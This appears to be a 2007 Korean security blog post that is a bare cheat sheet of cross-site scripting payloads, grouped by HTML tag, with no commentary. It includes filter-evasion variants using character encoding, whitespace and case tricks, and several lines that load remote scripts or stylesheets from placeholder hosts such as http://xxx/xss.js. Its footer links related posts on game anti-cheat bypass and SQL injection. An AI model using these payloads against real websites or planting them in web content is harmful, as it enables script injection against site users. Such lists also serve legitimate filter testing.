본문 바로가기
Security

XSS

by Hide­ 2007. 3. 8.
반응형

[1] XSS Javascript Injection

      <SCRIPT SRC=http://xxx/xss.js></SCRIPT>


[2] Image XSS의 다양한 Type

      <IMG SRC="javascript:alert('XSS');">

      <IMG SRC=javascript:alert('XSS')>

      <IMG SRC=JaVaScRiPt:alert('XSS')>

      <IMG SRC=javascript:alert(&quot;XSS&quot;)>

      <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

      <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

      <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

      <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

      <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

      <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

      <IMG SRC="jav ascript:alert('XSS');">

      <IMG SRC="jav&#x09;ascript:alert('XSS');">

      <IMG SRC="jav&#x0A;ascript:alert('XSS');">

      <IMG SRC="jav&#x0D;ascript:alert('XSS');">

      <IMG SRC=" &#14;  javascript:alert('XSS');">

      <IMG SRC="javascript:alert('XSS')"

      <IMG DYNSRC="javascript:alert('XSS')">

      <IMG LOWSRC="javascript:alert('XSS')">

      <IMG SRC='vbscript:msgbox("XSS")'>


[3] Non-alpha-non-digit XSS

      <SCRIPT/XSS SRC="http://xxxx/xss.js"></SCRIPT>


[4] Title Tag XSS

      </TITLE><SCRIPT>alert("XSS");</SCRIPT>


[5] Input Tag XSS

      <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


[6] Body Tag XSS

      <BODY BACKGROUND="javascript:alert('XSS')">

      <BODY ONLOAD=alert('XSS')>


[7] Meta Tag XSS

      <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

      <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">


[8] Frame Tag XSS

      <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

      <iframe src=http://xxxx/scriptlet.html <

      <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>


[9] Table Tag XSS

      <TABLE BACKGROUND="javascript:alert('XSS')">

      <TABLE><TD BACKGROUND="javascript:alert('XSS')">


[10] DIV Tag XSS

      <DIV STYLE="background-image: url(javascript:alert('XSS'))">

      <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

      <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

      <DIV STYLE="width: expression(alert('XSS'));">


[11] Style Tag XSS

      <STYLE>@import'http://xxx/xss.css';</STYLE>

      <XSS STYLE="behavior: url(xss.htc);">

      <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

      <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

      <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

      <XSS STYLE="xss:expression(alert('XSS'))">

      <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

      <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>


[12] Various Tag XSS

      <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

      <LINK REL="stylesheet" HREF=http://xxx/xss.css>

      <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->

      <BASE HREF="javascript:alert('XSS');//">

      <EMBED SRC=http://xxxx/xss.swf AllowScriptAccess="always"></EMBED>


[13] Other Types

      <<SCRIPT>alert("XSS");//<</SCRIPT>

      <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

      \";alert('XSS');//

      ¼script¾alert(¢XSS¢)¼/script¾

      ><script>alert(xss)</script>

'Security' 카테고리의 다른 글

About GameGuard  (0) 2007.03.08
Bypass REV 833  (0) 2007.03.08
Wall Hack 의 원리  (1) 2007.03.08
DB 에러메시지를 이용하여 데이터추출하기  (0) 2007.03.08
중국해커들의 SQL Injection  (0) 2007.03.08